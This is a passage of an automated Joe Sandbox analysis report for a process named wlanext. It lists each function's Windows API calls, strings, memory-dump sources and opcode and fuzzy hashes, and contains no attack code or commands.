                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalErrorLastSection$CreateEnterEventHeapInformationLeaveMessageTrace_wtol
                                            • String ID:
                                            • API String ID: 2628779187-0
                                            • Opcode ID: 9394c857f6fd4582bca58dae98e862159982249bca5fa2105bd83aa0eeb3b76c
                                            • Instruction ID: f532798494068ef290635e41c7f3b2055f8b21dea1772063b7d433b3ca057b0b
                                            • Opcode Fuzzy Hash: 9394c857f6fd4582bca58dae98e862159982249bca5fa2105bd83aa0eeb3b76c
                                            • Instruction Fuzzy Hash: B4B1E9329012D5A6DB2A9F12985CB393E57AF403A4739009DE9051F2ABCB63CF43F795
                                            Function 00FEEA60 Relevance: 9.2, APIs: 6, Instructions: 233sleepfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTickCount64.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEEAFE
                                            • GetTickCount64.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEEB5F
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 00FEEC1C
                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?), ref: 00FEECC7
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEECD7
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00FEED23
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Count64Tick$CloseErrorFileHandleLastReadSleep
                                            • String ID:
                                            • API String ID: 3641083157-0
                                            • Opcode ID: 7611dfa5c9439b0270ff2366d42aa8de11d00608aa29b2e2c50fa343c56acd2a
                                            • Instruction ID: 5d88111e6077111f9d3198d86d04d61b9f803d35c115acd824ce5fd8f4923b65
                                            • Opcode Fuzzy Hash: 7611dfa5c9439b0270ff2366d42aa8de11d00608aa29b2e2c50fa343c56acd2a
                                            • Instruction Fuzzy Hash: 5A91D271A00385DFDB24DF2AED44B2677E6BF88325F240A2DE442872A1D734E885FB45
                                            Function 00FEDC0C Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00FEDC2A
                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00FEDC37
                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00FEDC82
                                            • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(0000000C,00000001,00000000,00000000), ref: 00FEDCCA
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEDCD7
                                              • Part of subcall function 00FEDD04: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00FEDCE6), ref: 00FEDD11
                                              • Part of subcall function 00FEDD04: DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD21
                                              • Part of subcall function 00FEDD04: DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD32
                                              • Part of subcall function 00FEDD04: memset.MSVCRT ref: 00FEDD3D
                                            • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00FEDCEB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$DeleteEventInitializememset$CloseCreateErrorHandleLast
                                            • String ID:
                                            • API String ID: 3741578413-0
                                            • Opcode ID: ec71acfeb0fc8f2cf6072577cf4dc2115ab0f5da3de67221d0cf89a0fae156e1
                                            • Instruction ID: a92e3da1d3486d3b1eca7a7722c1000efa984ad094449b1e3127c409da9de328
                                            • Opcode Fuzzy Hash: ec71acfeb0fc8f2cf6072577cf4dc2115ab0f5da3de67221d0cf89a0fae156e1
                                            • Instruction Fuzzy Hash: FB11B2B2D00708AFD7608FA9ED45BAEB7F5FF48310F200529E202E7290DBB49604EB45
                                            Function 0363B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: daf670dff254dee4c4a5a7ca50d0e098cfd03f04fe69953a74fdc014430beee7
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: FD81EE70E452499EDF28CE68C9917FEBBB2EF47320F1C425AD861A7392C7308851CB54
                                            Function 00FE31DC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Wlansvc\IHVExtensibility,00000000,00020019,?), ref: 00FE3244
                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,HandlerTimeout,00000000,?,?,00000004), ref: 00FE32A3
                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00FE331D
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Strings
                                            • Software\Microsoft\Wlansvc\IHVExtensibility, xrefs: 00FE323A
                                            • HandlerTimeout, xrefs: 00FE329B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CloseMessageOpenQueryTraceValue
                                            • String ID: HandlerTimeout$Software\Microsoft\Wlansvc\IHVExtensibility
                                            • API String ID: 3821667754-1486466383
                                            • Opcode ID: 9e98b80c99d6a9fafbfc1161ba5979f1cf682aebb5dc981e3bf26b82253772e2
                                            • Instruction ID: 6ab9182a16deb7a570280bbe848c5b99da13d8f2e9052a8f1fa5bff28ee520b1
                                            • Opcode Fuzzy Hash: 9e98b80c99d6a9fafbfc1161ba5979f1cf682aebb5dc981e3bf26b82253772e2
                                            • Instruction Fuzzy Hash: 0241E5319002C8FFDB258F53880CE697FA9FF45355B15409AE6016B2AACB72CA81FB55
                                            Function 00FE8FA8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520,00000004,00000000,00000001), ref: 00FE8FF0
                                            • QueueUserWorkItem.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(00FE9110,00000000,00000010,00000008,00000000), ref: 00FE9051
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE905B
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520), ref: 00FE90D2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterErrorItemLastLeaveMessageQueueTraceUserWork
                                            • String ID: call table
                                            • API String ID: 1836903735-1857531114
                                            • Opcode ID: a4e7f1221a69e535f0098075e24024cd0a109936c733779a3ca3a419fd92e637
                                            • Instruction ID: cf04d8c1080d9c0c8457ea7230c83d057fdc7e8e0fc05b6844bb96f75f14e0cc
                                            • Opcode Fuzzy Hash: a4e7f1221a69e535f0098075e24024cd0a109936c733779a3ca3a419fd92e637
                                            • Instruction Fuzzy Hash: 1C41F7719043C4ABC72A8F278808F697BA6FF44764F154094EA056B2B6CBF6CD80F765
                                            Function 036A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: 4fbfe4d1a18fd94ffb10aa12f303103316e8cd536e8cf8fb00f9b5ad3101d725
                                            • Instruction ID: a142af54146016c9812cb8db1a782c57bdb4a9c471675d0bb168dc4292c7614d
                                            • Opcode Fuzzy Hash: 4fbfe4d1a18fd94ffb10aa12f303103316e8cd536e8cf8fb00f9b5ad3101d725
                                            • Instruction Fuzzy Hash: 4821537AE00619ABCB10DE69DD50AEEBBE8EF44640F08051AEA15D7240E730DE158BA1
                                            Function 00FEF69C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF6E8
                                            • memcpy.MSVCRT ref: 00FEF706
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000004,00000000,?,?,SetUnicastCipherAlgorithm,00000000,?), ref: 00FEF72C
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF740
                                            Strings
                                            • SetUnicastCipherAlgorithm, xrefs: 00FEF6A9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID: SetUnicastCipherAlgorithm
                                            • API String ID: 1706616652-4110488708
                                            • Opcode ID: 551fe0c25d15264f782b24d3a1f709af87aa9d1f6ea8b7139ccc819c28c0fb99
                                            • Instruction ID: 9ea13626bc9b020c9db7bf541adbc26590fb72b503ad2c79a32d0ee846d0e7e0
                                            • Opcode Fuzzy Hash: 551fe0c25d15264f782b24d3a1f709af87aa9d1f6ea8b7139ccc819c28c0fb99
                                            • Instruction Fuzzy Hash: 5A210836A00115BBDB11EB56CC85FAEBBADEF84360F108075E909EB251DB34DE09E790
                                            Function 00FEF40A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF456
                                            • memcpy.MSVCRT ref: 00FEF474
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000004,00000000,00000000), ref: 00FEF49C
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF4B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID: SetAuthAlgorithm
                                            • API String ID: 1706616652-781480318
                                            • Opcode ID: 3a5bf7b0284067901d98d06faafa35e6af6458edf8055391f2ae3c8ac34c62f8
                                            • Instruction ID: 59776fcb008e10a0402966f3c75a5e8674e48101beeed7d4216eff185144ee23
                                            • Opcode Fuzzy Hash: 3a5bf7b0284067901d98d06faafa35e6af6458edf8055391f2ae3c8ac34c62f8
                                            • Instruction Fuzzy Hash: 3F21D432A00165ABEB14DB15CC45FAFB76CEF80360F108036EA09DB281DB34DD05E7A1
                                            Function 00FEA5CA Relevance: 7.7, APIs: 5, Instructions: 155timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,00000001,00000000,00000001,00000000,00000000), ref: 00FEA60C
                                            • ChangeTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(00000064,00000064), ref: 00FEA66E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA678
                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000014,00000000), ref: 00FEA734
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,00000014,00000000), ref: 00FEA782
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSectionTimer$ChangeCountEnterErrorLastLeaveMessageQueueTickTrace
                                            • String ID:
                                            • API String ID: 3417154314-0
                                            • Opcode ID: 5dc55c7a1ee60013a1afa5bd71ef078f6a89243cc1ecdb5fe203be8cb779ce64
                                            • Instruction ID: a5f008f13cc7e1a2ff3a51d25136e29477f12b4ca74ecaa954d4d8a84db5fcf0
                                            • Opcode Fuzzy Hash: 5dc55c7a1ee60013a1afa5bd71ef078f6a89243cc1ecdb5fe203be8cb779ce64
                                            • Instruction Fuzzy Hash: CD51E275A003C4ABD725CF26D848B667FAABF40365F184059F9014B2B6C7B6E880FF56
                                            Function 00FE39A0 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                            Download Yara Rule
                                            APIs
                                            • QueueUserWorkItem.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(Function_00003950,00000000,00000010), ref: 00FE39B3
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE39BD
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(000002C9), ref: 00FE39FF
                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000), ref: 00FE3A06
                                            • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FE3A0D
                                              • Part of subcall function 00FE2B8E: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,?,00000004,00000000), ref: 00FE2BA5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Process$CurrentErrorExitItemLastMessageQueueTerminateTraceUserWork
                                            • String ID:
                                            • API String ID: 2743426024-0
                                            • Opcode ID: a97ca14521997ba414d4a0041e6ae3ab770e061bb1fd4e97378800444be57a2b
                                            • Instruction ID: c3d0a0f08a7a6fb54344333b51240126cebbbbd2242ab174b6e2bef01b3621c6
                                            • Opcode Fuzzy Hash: a97ca14521997ba414d4a0041e6ae3ab770e061bb1fd4e97378800444be57a2b
                                            • Instruction Fuzzy Hash: 87F04C32500288ABD7381B63AC0DFBA3A5DEF00321F200155FA00421E2DFB68981F665
                                            Function 00FEDD48 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00FE1A24,?,00FE9CD7,00000000,?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD4F
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD59
                                            • ResetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD6F
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD76
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD7D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$EventReset
                                            • String ID:
                                            • API String ID: 3754699133-0
                                            • Opcode ID: 5577d38af940425ecce94921413d8b23dc5c9618275392611347e36f7b6b1f8e
                                            • Instruction ID: 5b09aa684f42f0db87216a49b7988de9f395fe1f4c04025a838f6005ea7846c6
                                            • Opcode Fuzzy Hash: 5577d38af940425ecce94921413d8b23dc5c9618275392611347e36f7b6b1f8e
                                            • Instruction Fuzzy Hash: F4E0ED72401515AF87A15B15ED4CC6BBB79FF853163104559E10682520DF74A446EB61
                                            Function 0361F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036602E7
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036602BD
                                            • RTL: Re-Waiting, xrefs: 0366031E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: fb74887a2a9fc78eebec3c97fa5a555d57ce8f176b0d25e441c8de5a1625b450
                                            • Instruction ID: 8c8660081274d9db243ba058e8693bc83f1f711500be47fd5e1bd0480db85f59
                                            • Opcode Fuzzy Hash: fb74887a2a9fc78eebec3c97fa5a555d57ce8f176b0d25e441c8de5a1625b450
                                            • Instruction Fuzzy Hash: B6E1DC316087419FD725CF28C984B2AB7E4BF88364F180A6DF4A68B3E1D774D865CB42
                                            Function 0362BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Resource at %p, xrefs: 03667B8E
                                            • RTL: Re-Waiting, xrefs: 03667BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03667B7F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 3d833a88ae1c224af798c20e2d3ee2b03f0dffbfce5f6ac9d4b0cf9ec6b9d18d
                                            • Instruction ID: f421235d491ea6c7b9dedb07e573fe8e39b9ed85bd8f6ceb45a946eb104208b2
                                            • Opcode Fuzzy Hash: 3d833a88ae1c224af798c20e2d3ee2b03f0dffbfce5f6ac9d4b0cf9ec6b9d18d
                                            • Instruction Fuzzy Hash: 60410435700B029FC724DE69D940B6ABBE5EF88720F040A1DF86ADB780DB71E8058F95
                                            Function 0362B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0366728C
                                            Strings
                                            • RTL: Resource at %p, xrefs: 036672A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03667294
                                            • RTL: Re-Waiting, xrefs: 036672C1
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 57d750ae9afe29a688e8cdbf6f1dcfd573f5a066fe070f32d155a5cd342ab00f
                                            • Instruction ID: 92ca954192f2afbfd97f1d2edbacb480db99f6e738af1f88ef2e3b988c015734
                                            • Opcode Fuzzy Hash: 57d750ae9afe29a688e8cdbf6f1dcfd573f5a066fe070f32d155a5cd342ab00f
                                            • Instruction Fuzzy Hash: D5411F35600716AFC720DE24CC81F6ABBA9FF84754F180619FC56AB340DB20F8428BE9
                                            Function 036A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: 4c31343ad00b16de19608f4a162cd98fe1092e1e6b57b18579bffb0c28626214
                                            • Instruction ID: 66b05c2e649751b407856b1bea2ae768918a54662826ec4576ad13021498e9a9
                                            • Opcode Fuzzy Hash: 4c31343ad00b16de19608f4a162cd98fe1092e1e6b57b18579bffb0c28626214
                                            • Instruction Fuzzy Hash: A3318676A006299FCB24DE2DDD50BEFB7F8EF45610F440559E849E7240EB309E448FA0
                                            Function 00FEF81F Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memcpy.MSVCRT ref: 00FEF8BD
                                            • memcpy.MSVCRT ref: 00FEF8DB
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,-0000001C,00000000,00000004,00000000,?,00000000,00000003,00000000,?,00000000), ref: 00FEF903
